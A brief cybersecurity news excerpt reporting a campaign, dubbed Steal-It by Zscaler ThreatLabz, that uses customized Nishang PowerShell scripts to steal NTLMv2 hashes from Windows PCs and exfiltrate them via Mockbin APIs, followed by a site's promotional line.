The PowerShell script connected to a reliable red teaming tool is being used by a new cyber attack campaign to steal NTLMv2 hashes from infected Windows PCs, mostly in Australia, Poland, and Belgium.
Zscaler ThreatLabz has given the activity the secret moniker Steal-It.
According to security researchers Niraj Shivtarkar and Avinash Kumar, “in this campaign, the threat actors steal and exfiltrate NTLMv2 hashes using customized versions of Nishang’s Start-CaptureServer PowerShell script, executing various system commands, and exfiltrating the retrieved data via Mockbin APIs.”
A framework and collection of PowerShell scripts and payloads called Nishang is used for red teaming, penetration testing, and offensive security read more Cybercriminals Using PowerShell to Steal NTLMv2 Hashes from Compromised Windows.
Stay informed with the best cybersecurity news and raise your cybersecurity awareness with our comprehensive coverage of the latest threats, breaches, and solutions.